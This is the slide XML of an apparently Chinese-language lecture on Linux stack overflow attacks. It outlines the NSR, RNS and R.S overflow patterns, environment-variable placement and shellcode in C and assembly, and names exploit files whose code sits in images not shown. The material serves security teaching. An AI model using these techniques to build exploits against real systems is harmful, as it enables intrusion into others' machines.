                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272397"/>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272405"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272405"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272405"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272405"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27240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2404"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272404"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272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4" grpId="0" animBg="1"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3F2497A2-C266-4730-91A0-51BBD87D646F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278530" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统下的栈溢出攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278531" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>栈溢出攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>NSR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Nop-Shellcode-Ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>NRS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>R.S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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47190BEE-584F-42C9-9CFC-656B5B65131E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273410"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3411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3416300" y="1965325"/>
            <a:ext cx="215900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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273412"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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273413"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3414"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5"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3416" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="559117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7" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7931150"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3418" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="735012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3419" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6770688"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20" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6180138"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3421"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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="273422" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2551113" y="2546350"/>
            <a:ext cx="4495800" cy="228600"/>
            <a:chOff x="1296" y="1113"/>
            <a:chExt cx="2832" cy="144"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="273423" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1296" y="1113"/>
              <a:ext cx="2496"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24" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3763" y="1113"/>
              <a:ext cx="365"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3427" name="Text Box 19"/>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vulnerable1.c:	                  stackexploit1.c:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273429" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>NSR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>溢出模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="273430"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3284538"/>
            <a:ext cx="3527425"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32"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3284538"/>
            <a:ext cx="4968875" cy="2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AD2549E4-3DC0-4C13-B613-D1CA0245E9D0}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274434"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4435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5727700" y="1970088"/>
            <a:ext cx="2159000" cy="5762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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274436"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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274437"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4438"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39"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4440" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7861300" y="1970088"/>
            <a:ext cx="577850" cy="5762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1" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5149850"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4442" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="456882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4443" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3989388"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4" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3413125" y="1965325"/>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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274445"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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="274446" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2584450" y="2546350"/>
            <a:ext cx="2328863" cy="228600"/>
            <a:chOff x="1317" y="1113"/>
            <a:chExt cx="1467" cy="144"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="274447" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1626" y="1113"/>
              <a:ext cx="1158"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4448" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1317" y="1113"/>
              <a:ext cx="323"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4449" name="Text Box 17"/>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 c:	            	        stackexploit2.c:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274453" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>RNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>溢出模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="274454" name="Picture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3284538"/>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56"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3284538"/>
            <a:ext cx="432117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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6DA83411-6462-4CC6-8C46-CC1E2E3B2216}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275458" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3944938" y="1981200"/>
            <a:ext cx="215900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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275459" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="482600" y="257651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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275460" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6107113"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FILE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6688138"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NULL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275462" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3397250"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63" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6750050" y="26050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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275464" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="720725" y="2990850"/>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vulnerable2.c:	            	        stackexploit3.c:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275465" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7240588" y="23002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0xc0000000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275468" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2805113"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5469" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2224088"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5470" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1644650"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71" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1054100" y="1981200"/>
            <a:ext cx="577850" cy="5762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endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275472" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2454275" y="2543175"/>
            <a:ext cx="1519238" cy="269875"/>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3" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1978025" y="2576513"/>
            <a:ext cx="461963" cy="242887"/>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5" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>R.S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>溢出模式－利用环境变量</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="275476"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0200" y="3357563"/>
            <a:ext cx="4824413"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477"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357563"/>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AE62D5EE-40C9-4B7A-BEF9-0F7FDEAD8507}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271362" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shellcode C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2713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989138"/>
            <a:ext cx="7559675" cy="25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a:xfrm>
            <a:off x="6705600" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{26D37D99-7B6C-4F6E-B183-6B4FA52F2333}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285698" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>汇编版本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="285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989138"/>
            <a:ext cx="4103688"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989138"/>
            <a:ext cx="4248150" cy="338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02" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331913" y="5516563"/>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shellcode_asm.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285703" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5688013" y="5589588"/>
            <a:ext cx="2192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shellcode_asm_fix.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>去除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>\0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全服务的部署</a:t>
            </a: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760" y="2120169"/>
            <a:ext cx="6478456" cy="3181039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="上下箭头 4"/>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细粒度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>安全服务多</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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anose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
